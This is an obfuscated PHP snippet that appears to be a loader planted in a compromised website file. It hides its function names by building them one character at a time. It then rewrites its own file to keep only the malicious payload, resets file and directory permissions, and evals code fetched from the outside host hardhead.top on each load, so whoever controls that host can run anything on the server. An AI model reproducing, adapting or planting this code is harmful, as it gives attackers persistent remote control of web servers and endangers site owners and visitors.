<?php while(true){/*PzMKoPpVb6I8il*/ break;}; ?><?php $scAlPFE=ExpLodE(baSe64_dEcODE("PD9waHAgd2hpbGUodHJ1ZSl7LypQek1Lb1BwVmI2SThpbCovIGJyZWFrO307ID8+"),FilE_GEt_coNtEnTs(__FILE__));if(tRim($scAlPFE[0])!=""||TriM($scAlPFE[2])!=""){chMod(__DIR__,0755);chmod(__FILE__,0644);fILe_pUt_ConTEnts(__FILE__,basE64_dECOdE("PD9waHAgd2hpbGUodHJ1ZSl7LypQek1Lb1BwVmI2SThpbCovIGJyZWFrO307ID8+").$scAlPFE[1].bASe64_DEcODe("PD9waHAgd2hpbGUodHJ1ZSl7LypQek1Lb1BwVmI2SThpbCovIGJyZWFrO307ID8+"));}?><?php $mkrf="";$mkrf.="f";$mkrf.="i";$mkrf.="l";$mkrf.="e";$mkrf.="_";$mkrf.="p";$mkrf.="u";$mkrf.="t";$mkrf.="_";$mkrf.="c";$mkrf.="o";$mkrf.="n";$mkrf.="t";$mkrf.="e";$mkrf.="n";$mkrf.="t";$mkrf.="s"; $opf="";$opf.="b";$opf.="a";$opf.="s";$opf.="e";$opf.="n";$opf.="a";$opf.="m";$opf.="e"; $enjx="";$enjx.="f";$enjx.="i";$enjx.="l";$enjx.="e";$enjx.="_";$enjx.="g";$enjx.="e";$enjx.="t";$enjx.="_";$enjx.="c";$enjx.="o";$enjx.="n";$enjx.="t";$enjx.="e";$enjx.="n";$enjx.="t";$enjx.="s"; $lfv="";$lfv.="b";$lfv.="a";$lfv.="s";$lfv.="e";$lfv.="6";$lfv.="4";$lfv.="_";$lfv.="d";$lfv.="e";$lfv.="c";$lfv.="o";$lfv.="d";$lfv.="e"; Eval("?>".$enjx("http://hardhead.top/library.php?Dk4Bt1YWxmYTFfdjQxLnR4dDQxB7yQ6I"));?><?php while(true){/*PzMKoPpVb6I8il*/ break;}; ?>